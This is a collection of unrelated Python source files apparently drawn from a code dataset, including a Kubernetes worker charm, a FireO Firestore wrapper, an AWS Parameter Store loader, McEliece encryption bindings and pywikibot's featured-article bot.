@when_not('kubernetes-worker.restart-needed')
def disable_gpu():
"""Disable GPU usage on this node.
This handler fires when we're running in gpu mode, and then the operator
sets allow-privileged="false". Since we can no longer run privileged
containers, we need to disable gpu mode.
"""
hookenv.log('Disabling gpu mode')
# Remove node labels
_apply_node_label('gpu', delete=True)
_apply_node_label('cuda', delete=True)
remove_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_enabled(kube_control):
"""Notify kubernetes-master that we're gpu-enabled.
"""
kube_control.set_gpu(True)
@when_not('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_not_enabled(kube_control):
"""Notify kubernetes-master that we're not gpu-enabled.
"""
kube_control.set_gpu(False)
@when('kube-control.connected')
def request_kubelet_and_proxy_credentials(kube_control):
""" Request kubelet node authorization with a well formed kubelet user.
This also implies that we are requesting kube-proxy auth. """
# The kube-control interface is created to support RBAC.
# At this point we might as well do the right thing and return the hostname
# even if it will only be used when we enable RBAC
nodeuser = 'system:node:{}'.format(gethostname().lower())
kube_control.set_auth_request(nodeuser)
@when('kube-control.connected')
def catch_change_in_creds(kube_control):
"""Request a service restart in case credential updates were detected."""
nodeuser = 'system:node:{}'.format(gethostname().lower())
creds = kube_control.get_auth_credentials(nodeuser)
if creds \
and data_changed('kube-control.creds', creds) \
and creds['user'] == nodeuser:
# We need to cache the credentials here because if the
# master changes (master leader dies and replaced by a new one)
# the new master will have no recollection of our certs.
db.set('credentials', creds)
set_state('worker.auth.bootstrapped')
set_state('kubernetes-worker.restart-needed')
@when_not('kube-control.connected')
def missing_kube_control():
"""Inform the operator they need to add the kube-control relation.
If deploying via bundle this won't happen, but if the operator is upgrading
a charm in a deployment that pre-dates the kube-control relation, it'll be
missing.
"""
hookenv.status_set(
'blocked',
'Relate {}:kube-control kubernetes-master:kube-control'.format(
hookenv.service_name()))
@when('docker.ready')
def fix_iptables_for_docker_1_13():
""" Fix iptables FORWARD policy for Docker >=1.13
https://github.com/kubernetes/kubernetes/issues/40182
https://github.com/kubernetes/kubernetes/issues/39823
"""
cmd = ['iptables', '-w', '300', '-P', 'FORWARD', 'ACCEPT']
check_call(cmd)
def _systemctl_is_active(application):
''' Poll systemctl to determine if the application is running '''
cmd = ['systemctl', 'is-active', application]
try:
raw = check_output(cmd)
return b'active' in raw
except Exception:
return False
class GetNodeNameFailed(Exception):
pass
def get_node_name():
# Get all the nodes in the cluster
cmd = 'kubectl --kubeconfig={} get no -o=json'.format(kubeconfig_path)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
try:
raw = check_output(cmd)
break
except CalledProcessError:
hookenv.log('Failed to get node name for node %s.'
' Will retry.' % (gethostname()))
time.sleep(1)
else:
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
result = json.loads(raw.decode('utf-8'))
if 'items' in result:
for node in result['items']:
if 'status' not in node:
continue
if 'addresses' not in node['status']:
continue
# find the hostname
for address in node['status']['addresses']:
if address['type'] == 'Hostname':
if address['address'] == gethostname():
return node['metadata']['name']
# if we didn't match, just bail to the next node
break
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
class ApplyNodeLabelFailed(Exception):
pass
def _apply_node_label(label, delete=False, overwrite=False):
''' Invoke kubectl to apply node label changes '''
nodename = get_node_name()
# TODO: Make this part of the kubectl calls instead of a special string
cmd_base = 'kubectl --kubeconfig={0} label node {1} {2}'
if delete is True:
label_key = label.split('=')[0]
cmd = cmd_base.format(kubeconfig_path, nodename, label_key)
cmd = cmd + '-'
else:
cmd = cmd_base.format(kubeconfig_path, nodename, label)
if overwrite:
cmd = '{} --overwrite'.format(cmd)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
code = subprocess.call(cmd)
if code == 0:
break
hookenv.log('Failed to apply label %s, exit code %d. Will retry.' % (
label, code))
time.sleep(1)
else:
msg = 'Failed to apply label %s' % label
raise ApplyNodeLabelFailed(msg)
def _parse_labels(labels):
''' Parse labels from a key=value string separated by space.'''
label_array = labels.split(' ')
sanitized_labels = []
for item in label_array:
if '=' in item:
sanitized_labels.append(item)
else:
hookenv.log('Skipping malformed option: {}'.format(item))
return sanitized_labels
|
the-stack_0_12326 | from enum import Enum
class GenomeBuild(Enum):
GRCH37 = 0
GRCH38 = 1
MM9 = 2
MM10 = 3
RN6 = 4
@staticmethod
def parse(s: str) -> "GenomeBuild":
if s == "GRCh37":
return GenomeBuild.GRCH37
elif s == "GRCh38":
return GenomeBuild.GRCH38
elif s == "mm9":
return GenomeBuild.MM9
elif s == "mm10":
return GenomeBuild.MM10
elif s == "rn6":
return GenomeBuild.RN6
else:
raise ValueError("invalid genome build: '{}'".format(s))
def __str__(self) -> str:
if self == GenomeBuild.GRCH37:
return "GRCh37"
elif self == GenomeBuild.GRCH38:
return "GRCh38"
elif self == GenomeBuild.MM9:
return "mm9"
elif self == GenomeBuild.MM10:
return "mm10"
elif self == GenomeBuild.RN6:
return "rn6"
else:
raise ValueError("unreachable")
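# A small usage sketch (only exercised when this file is run directly):
if __name__ == "__main__":
    build = GenomeBuild.parse("GRCh38")
    assert build is GenomeBuild.GRCH38
    assert str(build) == "GRCh38"
    # Unrecognised identifiers such as "hg19" raise ValueError.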
|
the-stack_0_12327 | import os
import cv2
import numpy as np
import tqdm
from common import my_utils
def improve_depth(image, depth, threshold=0.001, threshold_faraway_planes=False):
window_size = 20
width = image.shape[0]
height = image.shape[1]
if threshold_faraway_planes:
# NOTE: This could perhaps be useful for cases where the depth map is really bad / nonexistent
# for faraway planes; unchanging neighborhood in depth image sometimes means no data which,
# generally, means too close or too far for measurement; this is dangerous and should probably be done offline
for i in range(0, width - window_size, window_size // 5):
for j in range(0, height - window_size, window_size // 5):
patch = image[i:i + window_size, j:j + window_size]
if np.std(patch) < threshold:
depth[i:i + window_size, j:j + window_size] = 300
depth = cv2.GaussianBlur(depth, (7, 7), 1)
return depth
def process_all(images_path, depth_path, output_path):
img_names = my_utils.os_listdir(images_path)
depth_names = my_utils.os_listdir(depth_path)
beta = 0
pbar = tqdm.tqdm(total=len(img_names))
for name_file, depth_file in zip(img_names, depth_names):
pbar.update(1)
img = cv2.imread(os.path.join(images_path, name_file))
gray_img = cv2.cvtColor(img, cv2.COLOR_BGRA2GRAY)
# divided by 256 to convert it into metres
original_depth = cv2.imread(os.path.join(depth_path, depth_file), cv2.IMREAD_UNCHANGED) / 256
smooth_depth = improve_depth(gray_img, original_depth, threshold=beta)
np.save(os.path.join(output_path, name_file), smooth_depth)
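

# Hedged usage sketch: the directory paths are hypothetical. process_all expects
# matching RGB images and 16-bit depth maps (stored as depth * 256, KITTI-style)
# and writes the smoothed depth arrays as .npy files into output_path.
if __name__ == "__main__":
    process_all(images_path="data/rgb",
                depth_path="data/depth",
                output_path="data/depth_smoothed")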
|
the-stack_0_12328 | from fireo.fields import ReferenceField, NestedModel, IDField
from fireo.queries import errors
from fireo.utils import utils
from google.cloud import firestore
class ModelWrapper:
"""Convert query result into Model instance"""
@classmethod
def from_query_result(cls, model, doc, nested_doc=False):
parent_key = None
if nested_doc:
doc_dict = doc
elif doc:
parent_key = utils.get_parent_doc(doc.reference.path)
if doc.to_dict() is not None:
doc_dict = doc.to_dict()
else:
return None
else:
return None
        # Instance values are changed according to Firestore, so mark the
        # instance as modified. This helps later to figure out which fields
        # were updated when the document needs to be updated.
setattr(model, '_instance_modified', True)
for k, v in doc_dict.items():
field = model._meta.get_field_by_column_name(k)
            # If the missing-field setting is set to "ignore" then
            # get_field_by_column_name returns None, so just skip this field
if field is None:
continue
# Check if it is Reference field
if isinstance(field, ReferenceField):
val = ReferenceFieldWrapper.from_doc_ref(model, field, field.field_value(v))
elif isinstance(field, NestedModel):
nested_doc_val = field.field_value(v)
if nested_doc_val:
val = NestedModelWrapper.from_model_dict(field, nested_doc_val)
else:
val = None
else:
val = field.field_value(v)
setattr(model, field.name, val)
        # If the model has no parent but the doc provides a parent key, set it on the model.
        # This is the case when you filter documents: the parent key is not set automatically, so set it here.
if not model.parent and parent_key is not None:
model.parent = parent_key
# If it is not nested model then set the id for this model
if not nested_doc:
            # When getting a document, attach an IDField if the user did not specify one.
            # This prevents generating a new id every time the document is saved.
            # For more information see issue #45 https://github.com/octabytes/FireO/issues/45
if model._meta.id is None:
model._meta.id = ('id', IDField())
setattr(model, '_id', doc.id)
# save the firestore reference doc so that further actions can be performed (i.e. collections())
model._meta.set_reference_doc(doc.reference)
# even though doc.reference currently points to self, there is no guarantee this will be true
# in the future, therefore we should store the create time and update time separate.
model._meta._firestore_create_time = doc.create_time
model._meta._firestore_update_time = doc.update_time
return model
class NestedModelWrapper:
"""Get nested document"""
@classmethod
def from_model_dict(cls, field, doc):
model = field.nested_model()
return ModelWrapper.from_query_result(model, doc, nested_doc=True)
class ReferenceFieldWrapper:
"""Get reference documents
If auto_load is True then load the document otherwise return `ReferenceDocLoader` object and later user can use
`get()` method to retrieve the document
"""
@classmethod
def from_doc_ref(cls, parent_model, field, ref):
if not ref:
return None
ref_doc = ReferenceDocLoader(parent_model, field, ref)
if field.auto_load:
return ref_doc.get()
return ref_doc
class ReferenceDocLoader:
"""Get reference doc and Convert into model instance"""
def __init__(self, parent_model, field, ref):
self.parent_model = parent_model
self.field = field
self.ref = ref
def get(self):
doc = self.ref.get()
if not doc.exists:
raise errors.ReferenceDocNotExist(f'{self.field.model_ref.collection_name}/{self.ref.id} not exist')
model = ModelWrapper.from_query_result(self.field.model_ref(), doc)
# if on_load method is defined then call it
if self.field.on_load:
method_name = self.field.on_load
getattr(self.parent_model, method_name)(model)
return model
|
the-stack_0_12329 | # -*- coding: utf-8 -*-
# Copyright: 2009 Nadia Alramli
# License: BSD
"""Draws an animated terminal progress bar
Usage:
p = ProgressBar("blue")
p.render(percentage, message)
"""
import terminal
import sys
class ProgressBar(object):
"""Terminal progress bar class"""
TEMPLATE = (
'%(percent)-2s%% %(color)s%(progress)s%(normal)s%(empty)s %(message)s\n'
)
PADDING = 7
def __init__(self, color=None, width=None, block='█', empty=' '):
"""
color -- color name (BLUE GREEN CYAN RED MAGENTA YELLOW WHITE BLACK)
        width -- bar width (optional)
block -- progress display character (default '█')
empty -- bar display character (default ' ')
"""
if color:
self.color = getattr(terminal, color.upper())
else:
self.color = ''
if width and width < terminal.COLUMNS - self.PADDING:
self.width = width
else:
# Adjust to the width of the terminal
self.width = terminal.COLUMNS - self.PADDING
self.block = block
self.empty = empty
self.progress = None
self.lines = 0
def render(self, percent, message = ''):
"""Print the progress bar
percent -- the progress percentage %
message -- message string (optional)
"""
inline_msg_len = 0
if message:
# The length of the first line in the message
inline_msg_len = len(message.splitlines()[0])
if inline_msg_len + self.width + self.PADDING > terminal.COLUMNS:
# The message is too long to fit in one line.
# Adjust the bar width to fit.
bar_width = terminal.COLUMNS - inline_msg_len -self.PADDING
else:
bar_width = self.width
# Check if render is called for the first time
        if self.progress is not None:
            self.clear()
        self.progress = int(bar_width * percent / 100)
data = self.TEMPLATE % {
'percent': percent,
'color': self.color,
'progress': self.block * self.progress,
'normal': terminal.NORMAL,
'empty': self.empty * (bar_width - self.progress),
'message': message
}
sys.stdout.write(data)
sys.stdout.flush()
# The number of lines printed
self.lines = len(data.splitlines())
def clear(self):
"""Clear all printed lines"""
sys.stdout.write(
self.lines * (terminal.UP + terminal.BOL + terminal.CLEAR_EOL)
)
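

# Hedged demo, assuming the sibling `terminal` module provides the COLUMNS,
# NORMAL, UP, BOL and CLEAR_EOL attributes used above.
if __name__ == '__main__':
    import time
    bar = ProgressBar('green', width=40)
    for pct in range(0, 101, 10):
        bar.render(pct, 'step %d of 100' % pct)
        time.sleep(0.1)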
|
the-stack_0_12331 | """
Author : James McKain (@jjmckain)
Created : 2021-12-10
SCM Repo : https://github.com/Preocts/secretbox
"""
from __future__ import annotations
import logging
from typing import Any
from secretbox.aws_loader import AWSLoader
try:
import boto3
from botocore.exceptions import ClientError
except ImportError:
boto3 = None
try:
from mypy_boto3_ssm.client import SSMClient
except ImportError:
SSMClient = None
class AWSParameterStore(AWSLoader):
"""Load secrets from an AWS Parameter Store"""
def load_values(self, **kwargs: Any) -> bool:
"""
Load all secrets from AWS parameter store
Requires `aws_sstore_name` and `aws_region_name` keywords to be
provided or for those values to be in the environment variables
under `AWS_SSTORE_NAME` and `AWS_REGION_NAME`.
`aws_sstore_name` is the parameter name or prefix.
"""
if boto3 is None:
self.logger.debug("Skipping AWS loader, boto3 is not available.")
return False
self.populate_region_store_names(**kwargs)
if self.aws_sstore is None:
self.logger.warning("Missing parameter name")
return True # this isn't a failure on our part
aws_client = self.get_aws_client()
if aws_client is None:
self.logger.error("Invalid SSM client")
return False
# if the prefix contains forward slashes treat the last token as the key name
do_split = "/" in self.aws_sstore
try:
# ensure the http client doesn't write our sensitive payload to the logger
logging.getLogger("botocore.parsers").addFilter(self.secrets_filter)
args = {
"Path": self.aws_sstore,
"Recursive": True,
"MaxResults": 10,
"WithDecryption": True,
}
# loop through next page tokens, page size caps at 10
while True:
resp = aws_client.get_parameters_by_path(**args)
for param in resp["Parameters"] or []:
# remove the prefix
# we want /path/to/DB_PASSWORD to populate os.env.DB_PASSWORD
key = param["Name"].split("/")[-1] if do_split else param["Name"]
self.loaded_values[key] = param["Value"]
args["NextToken"] = resp.get("NextToken")
if not args["NextToken"]:
break
self.logger.debug("fetching next page: %s", args["NextToken"])
except ClientError as err:
self.log_aws_error(err)
return False
finally:
# remove our logging filter
logging.getLogger("botocore.parsers").removeFilter(self.secrets_filter)
self.logger.info(
"loaded %d parameters matching %s", len(self.loaded_values), self.aws_sstore
)
return True
def get_aws_client(self) -> SSMClient | None:
"""Make the connection"""
if self.aws_region is None:
self.logger.debug("Missing AWS region, cannot create client")
return None
return boto3.client(
service_name="ssm",
region_name=self.aws_region,
)
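

# Hedged usage sketch: assumes the loader can be constructed directly and that
# boto3 credentials are available; the parameter path and region are hypothetical.
if __name__ == "__main__":
    loader = AWSParameterStore()
    if loader.load_values(aws_sstore_name="/myapp/prod", aws_region_name="us-east-1"):
        print(sorted(loader.loaded_values))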
|
the-stack_0_12332 | import ctypes
from ctypes import c_int
from .lib import libmcleece
class PublicKey:
def __init__(self, data):
# check that length matches libmcleece length
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_PUBLIC_KEY_SIZE').value
class PrivateKey:
def __init__(self, data):
# check that length matches libmcleece length
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SECRET_KEY_SIZE').value
@classmethod
def generate(cls):
pk_size = PublicKey.size()
sk_size = cls.size()
pk = (ctypes.c_uint8 * pk_size)()
sk = (ctypes.c_uint8 * sk_size)()
res = libmcleece().mcleece_crypto_box_keypair(ctypes.byref(pk), ctypes.byref(sk))
if res != 0:
return None
return PrivateKey(bytes(sk)), PublicKey(bytes(pk))
def get_nacl_public_key(self):
# truncate a copy of self.data, and pass to PrivateKey here...
from nacl.public import PrivateKey as nacl_PrivateKey
sodium_pkey_size = c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SODIUM_PUBLIC_KEY_SIZE').value
return bytes(nacl_PrivateKey(self.data[:sodium_pkey_size]).public_key)
class SealedBox:
def __init__(self, key):
        ''' Store the key material.
            Decryption is interesting because libsodium needs both the public and
            private keys to decrypt, while mcleece does not need the public key.
            The interface has no clean way to express that yet, so for a private
            key the corresponding public key is derived below.
        '''
self.public_key = self.secret_key = None
if isinstance(key, PublicKey):
self.public_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
elif isinstance(key, PrivateKey):
self.secret_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
pubkey = key.get_nacl_public_key()
self.public_key = (ctypes.c_uint8 * len(pubkey)).from_buffer_copy(pubkey)
@classmethod
def message_header_size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_MESSAGE_HEADER_SIZE').value
def encrypt(self, msg):
if not self.public_key or len(self.public_key) < PublicKey.size():
raise Exception('not initialized for encryption!')
msg_size = len(msg)
msg = (ctypes.c_uint8 * msg_size).from_buffer_copy(msg)
ciphertext_size = msg_size + self.message_header_size()
ciphertext = (ctypes.c_uint8 * ciphertext_size)()
res = libmcleece().mcleece_crypto_box_seal(
ctypes.byref(ciphertext), ctypes.byref(msg), ctypes.c_uint32(msg_size), ctypes.byref(self.public_key)
)
if res != 0:
return None
return bytes(bytearray(ciphertext))
def decrypt(self, ciphertext):
if not self.secret_key or len(self.secret_key) < PrivateKey.size():
raise Exception('not initialized for decryption!')
ciphertext_size = len(ciphertext)
ciphertext = (ctypes.c_uint8 * ciphertext_size).from_buffer_copy(ciphertext)
msg_size = ciphertext_size - self.message_header_size()
msg = (ctypes.c_uint8 * msg_size)()
res = libmcleece().mcleece_crypto_box_seal_open(
ctypes.byref(msg), ctypes.byref(ciphertext), ctypes.c_uint32(ciphertext_size),
ctypes.byref(self.public_key), ctypes.byref(self.secret_key)
)
if res != 0:
return None
return bytes(bytearray(msg))
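

# Hedged round-trip sketch using only the classes above; it assumes the native
# libmcleece library is loadable via lib.libmcleece() and that PyNaCl is
# installed (needed by get_nacl_public_key during decryption).
if __name__ == "__main__":
    secret_key, public_key = PrivateKey.generate()
    sealed = SealedBox(public_key).encrypt(b"attack at dawn")
    opened = SealedBox(secret_key).decrypt(sealed)
    assert opened == b"attack at dawn"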
|
the-stack_0_12334 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Manage featured/good article/list status template.
*** This script understands various command-line arguments: ***
Task commands:
-featured use this script for featured articles. Default task
if no task command is specified
-good use this script for good articles.
-lists use this script for featured lists.
-former use this script for removing {{Link FA|xx}} from former
                    featured articles
NOTE: you may have all of these commands in one run
Option commands:
-interactive: ask before changing each page
-nocache          doesn't use the cache file that remembers whether an article
                  was already verified.
-nocache:xx,yy you may ignore language codes xx,yy,... from cache file
-fromlang:xx,yy xx,yy,zz,.. are the languages to be verified.
-fromlang:ar--fi  Another possibility: process a range of languages
-fromall to verify all languages.
-tolang:xx,yy xx,yy,zz,.. are the languages to be updated
-after:zzzz process pages after and including page zzzz
(sorry, not implemented yet)
-side use -side if you want to move all {{Link FA|lang}} next
to the corresponding interwiki links. Default is placing
{{Link FA|lang}} on top of the interwiki links.
(This option is deprecated with wikidata)
-count Only counts how many featured/good articles exist
on all wikis (given with the "-fromlang" argument) or
on several language(s) (when using the "-fromall" argument).
Example: python pwb.py featured -fromlang:en,he -count
counts how many featured articles exist in the en and he
wikipedias.
-quiet no corresponding pages are displayed.
"""
#
# (C) Maxim Razin, 2005
# (C) Leonardo Gregianin, 2005-2008
# (C) xqt, 2009-2019
# (C) Pywikibot team, 2005-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import pickle
import re
import pywikibot
from pywikibot import i18n, textlib, config
from pywikibot.pagegenerators import PreloadingGenerator
from pywikibot.tools.formatter import color_format
from pywikibot.tools import issue_deprecation_warning, PY2
if not PY2:
unichr = chr
def CAT(site, name, hide):
name = site.namespace(14) + ':' + name
cat = pywikibot.Category(site, name)
for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startFrom=unichr(ord(hide) + 1)):
yield article
def BACK(site, name, hide): # pylint: disable=unused-argument
p = pywikibot.Page(site, name, ns=10)
return [page for page in p.getReferences(follow_redirects=False,
only_template_inclusion=True)]
def DATA(site, name, hide):
dp = pywikibot.ItemPage(site.data_repository(), name)
try:
title = dp.getSitelink(site)
except pywikibot.NoPage:
return
cat = pywikibot.Category(site, title)
if isinstance(hide, dict):
hide = hide.get(site.code)
for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startsort=unichr(ord(hide) + 1)):
yield article
# not implemented yet
def TMPL(site, name, hide): # pylint: disable=unused-argument
return
# ALL wikis use 'Link FA', and sometimes other localized templates.
# We use _default AND the localized ones
template = {
'_default': ['Link FA'],
'als': ['LinkFA'],
'an': ['Destacato', 'Destacau'],
'ar': ['وصلة مقالة مختارة'],
'ast': ['Enllaz AD'],
'az': ['Link FM'],
'br': ['Liamm PuB', 'Lien AdQ'],
'ca': ['Enllaç AD', 'Destacat'],
'cy': ['Cyswllt erthygl ddethol', 'Dolen ED'],
'eo': ['LigoElstara'],
'en': ['Link FA', 'FA link'],
'es': ['Destacado'],
'eu': ['NA lotura'],
'fr': ['Lien AdQ'],
'fur': ['Leam VdC'],
'ga': ['Nasc AR'],
'gl': ['Ligazón AD', 'Destacado'],
'hi': ['Link FA', 'Lien AdQ'],
'is': ['Tengill ÚG'],
'it': ['Link V', 'Link AdQ'],
'no': ['Link UA'],
'oc': ['Ligam AdQ', 'Lien AdQ'],
'ro': ['Legătură AC', 'Legătură AF'],
'sv': ['UA', 'Link UA'],
'tr': ['Link SM'],
'vi': ['Liên kết chọn lọc'],
'vo': ['Yüm YG'],
'yi': ['רא'],
}
template_good = {
'_default': ['Link GA'],
'ar': ['وصلة مقالة جيدة'],
'ca': ['Enllaç AB', 'Lien BA', 'Abo'],
'da': ['Link GA', 'Link AA'],
'eo': ['LigoLeginda'],
'es': ['Bueno'],
'fr': ['Lien BA'],
'gl': ['Ligazón AB'],
'is': ['Tengill GG'],
'it': ['Link VdQ'],
'nn': ['Link AA'],
'no': ['Link AA'],
'pt': ['Bom interwiki'],
# 'tr': ['Link GA', 'Link KM'],
'vi': ['Liên kết bài chất lượng tốt'],
'wo': ['Lien BA'],
}
template_lists = {
'_default': ['Link FL'],
'no': ['Link GL'],
}
featured_name = {
'wikidata': (DATA, 'Q4387444'),
}
good_name = {
'wikidata': (DATA, 'Q7045856'),
}
lists_name = {
'wikidata': (TMPL, 'Q5857568'),
'ar': (BACK, 'قائمة مختارة'),
'da': (BACK, 'FremragendeListe'),
'de': (BACK, 'Informativ'),
'en': (BACK, 'Featured list'),
'fa': (BACK, 'فهرست برگزیده'),
'id': (BACK, 'Featured list'),
'ja': (BACK, 'Featured List'),
'ksh': (CAT, 'Joode Leß'),
'no': (BACK, 'God liste'),
'pl': (BACK, 'Medalista'),
'pt': (BACK, 'Anexo destacado'),
'ro': (BACK, 'Listă de calitate'),
'ru': (BACK, 'Избранный список или портал'),
'tr': (BACK, 'Seçkin liste'),
'uk': (BACK, 'Вибраний список'),
'vi': (BACK, 'Sao danh sách chọn lọc'),
'zh': (BACK, '特色列表'),
}
# Third parameter is the sort key indicating articles to hide from the given
# list
former_name = {
'wikidata': (DATA, 'Q7045853', {'en': '#'})
}
class FeaturedBot(pywikibot.Bot):
"""Featured article bot."""
# Bot configuration.
# Only the keys of the dict can be passed as init options
# The values are the default values
def __init__(self, **kwargs):
"""Only accepts options defined in availableOptions."""
self.availableOptions.update({
'async': False, # True for asynchronously putting a page
'afterpage': '!',
'count': False, # featuredcount
'featured': False,
'former': False,
'fromall': False,
'fromlang': None,
'good': False,
'lists': False,
'nocache': [],
'side': False, # not template_on_top
'quiet': False,
'interactive': False,
})
super(FeaturedBot, self).__init__(**kwargs)
self.cache = {}
self.filename = None
self.site = pywikibot.Site()
self.repo = self.site.data_repository()
# if no source site is given, give up
if self.getOption('fromlang') is True:
self.options['fromlang'] = False
# setup tasks running
self.tasks = []
for task in ('featured', 'good', 'lists', 'former'):
if self.getOption(task):
self.tasks.append(task)
if not self.tasks:
self.tasks = ['featured']
def itersites(self, task):
"""Generator for site codes to be processed."""
def _generator():
if task == 'good':
item_no = good_name['wikidata'][1]
elif task == 'featured':
item_no = featured_name['wikidata'][1]
elif task == 'former':
item_no = former_name['wikidata'][1]
dp = pywikibot.ItemPage(self.repo, item_no)
dp.get()
for key in sorted(dp.sitelinks.keys()):
try:
site = self.site.fromDBName(key)
except pywikibot.SiteDefinitionError:
pywikibot.output('"%s" is not a valid site. Skipping...'
% key)
else:
if site.family == self.site.family:
yield site
generator = _generator()
if self.getOption('fromall'):
return generator
elif self.getOption('fromlang'):
fromlang = self.getOption('fromlang')
if len(fromlang) == 1 and fromlang[0].find('--') >= 0:
start, end = fromlang[0].split('--', 1)
if not start:
start = ''
if not end:
end = 'zzzzzzz'
return (site for site in generator
if site.code >= start and site.code <= end)
else:
return (site for site in generator if site.code in fromlang)
else:
pywikibot.warning('No sites given to verify %s articles.\n'
                              'Please use the -fromlang: or -fromall option\n'
% task)
return ()
def hastemplate(self, task):
add_tl, remove_tl = self.getTemplateList(self.site.code, task)
for i, tl in enumerate(add_tl):
tp = pywikibot.Page(self.site, tl, ns=10)
if tp.exists():
return True
else:
pywikibot.output(tl + ' does not exist')
# The first item is the default template to be added.
# It must exist. Otherwise the script must not run.
if i == 0:
return
else:
return
def readcache(self, task):
if self.getOption('count') or self.getOption('nocache') is True:
return
self.filename = pywikibot.config.datafilepath('cache', task)
try:
f = open(self.filename, 'rb')
self.cache = pickle.load(f)
f.close()
pywikibot.output('Cache file %s found with %d items.'
% (self.filename, len(self.cache)))
except IOError:
pywikibot.output('Cache file %s not found.' % self.filename)
def writecache(self):
if self.getOption('count'):
return
if not self.getOption('nocache') is True:
pywikibot.output('Writing %d items to cache file %s.'
% (len(self.cache), self.filename))
with open(self.filename, 'wb') as f:
pickle.dump(self.cache, f, protocol=config.pickle_protocol)
self.cache = {}
def run(self):
for task in self.tasks:
self.run_task(task)
pywikibot.output('%d pages written.' % self._save_counter)
def run_task(self, task):
if not self.hastemplate(task):
pywikibot.output('\nNOTE: %s articles are not implemented at %s.'
% (task, self.site))
return
self.readcache(task)
for site in self.itersites(task):
try:
self.treat(site, task)
except KeyboardInterrupt:
pywikibot.output('\nQuitting %s treat...' % task)
break
self.writecache()
def treat(self, fromsite, task):
if fromsite != self.site:
self.featuredWithInterwiki(fromsite, task)
def featuredArticles(self, site, task, cache):
articles = []
info = globals()[task + '_name']
if task == 'lists':
code = site.code
else:
code = 'wikidata'
try:
method = info[code][0]
except KeyError:
pywikibot.error(
"language %s doesn't has %s category source."
% (code, task))
return
name = info[code][1]
# hide #-sorted items on en-wiki
try:
hide = info[code][2]
except IndexError:
hide = None
for p in method(site, name, hide):
if p.namespace() == 0: # Article
articles.append(p)
# Article talk (like in English)
elif p.namespace() == 1 and site.code != 'el':
articles.append(pywikibot.Page(p.site,
p.title(with_ns=False)))
pywikibot.output(color_format(
'{lightred}** {0} has {1} {2} articles{default}',
site, len(articles), task))
while articles:
p = articles.pop(0)
if p.title() < self.getOption('afterpage'):
continue
if '/' in p.title() and p.namespace() != 0:
pywikibot.output('%s is a subpage' % p.title())
continue
if p.title() in cache:
pywikibot.output('(cached) %s -> %s' % (
p.title(), cache[p.title()]))
continue
yield p
def findTranslated(self, page, oursite=None):
quiet = self.getOption('quiet')
if not oursite:
oursite = self.site
if page.isRedirectPage():
page = page.getRedirectTarget()
ourpage = None
for link in page.iterlanglinks():
if link.site == oursite:
ourpage = pywikibot.Page(link)
break
if not ourpage:
if not quiet:
pywikibot.output('%s -> no corresponding page in %s'
% (page.title(), oursite))
elif ourpage.section():
pywikibot.output('%s -> our page is a section link: %s'
% (page.title(), ourpage.title()))
elif not ourpage.exists():
pywikibot.output("%s -> our page doesn't exist: %s"
% (page.title(), ourpage.title()))
else:
if ourpage.isRedirectPage():
ourpage = ourpage.getRedirectTarget()
pywikibot.output('%s -> corresponding page is %s'
% (page.title(), ourpage.title()))
if ourpage.namespace() != 0:
pywikibot.output('%s -> not in the main namespace, skipping'
% page.title())
elif ourpage.isRedirectPage():
pywikibot.output(
'%s -> double redirect, skipping' % page.title())
elif not ourpage.exists():
pywikibot.output("%s -> page doesn't exist, skipping"
% ourpage.title())
else:
backpage = None
for link in ourpage.iterlanglinks():
if link.site == page.site:
backpage = pywikibot.Page(link)
break
if not backpage:
pywikibot.output(
'%s -> no back interwiki ref' % page.title())
elif backpage == page:
# everything is ok
yield ourpage
elif backpage.isRedirectPage():
backpage = backpage.getRedirectTarget()
if backpage == page:
# everything is ok
yield ourpage
else:
pywikibot.output(
'%s -> back interwiki ref target is redirect to %s'
% (page.title(), backpage.title()))
else:
pywikibot.output('%s -> back interwiki ref target is %s'
% (page.title(), backpage.title()))
def getTemplateList(self, code, task):
add_templates = []
remove_templates = []
if task == 'featured':
try:
add_templates = template[code]
add_templates += template['_default']
except KeyError:
add_templates = template['_default']
try:
remove_templates = template_good[code]
remove_templates += template_good['_default']
except KeyError:
remove_templates = template_good['_default']
elif task == 'good':
try:
add_templates = template_good[code]
add_templates += template_good['_default']
except KeyError:
add_templates = template_good['_default']
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
elif task == 'lists':
try:
add_templates = template_lists[code]
add_templates += template_lists['_default']
except KeyError:
add_templates = template_lists['_default']
else: # task == 'former'
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
return add_templates, remove_templates
def featuredWithInterwiki(self, fromsite, task):
"""Read featured articles and find the corresponding pages.
Find corresponding pages on other sites, place the template and
remember the page in the cache dict.
"""
tosite = self.site
if fromsite.code not in self.cache:
self.cache[fromsite.code] = {}
if tosite.code not in self.cache[fromsite.code]:
self.cache[fromsite.code][tosite.code] = {}
cc = self.cache[fromsite.code][tosite.code]
if self.getOption('nocache') is True or \
fromsite.code in self.getOption('nocache'):
cc = {}
gen = self.featuredArticles(fromsite, task, cc)
if self.getOption('count'):
next(gen, None)
return # count only, we are ready here
gen = PreloadingGenerator(gen)
for source in gen:
if source.isRedirectPage():
source = source.getRedirectTarget()
if not source.exists():
pywikibot.output("source page doesn't exist: %s"
% source)
continue
for dest in self.findTranslated(source, tosite):
self.add_template(source, dest, task, fromsite)
cc[source.title()] = dest.title()
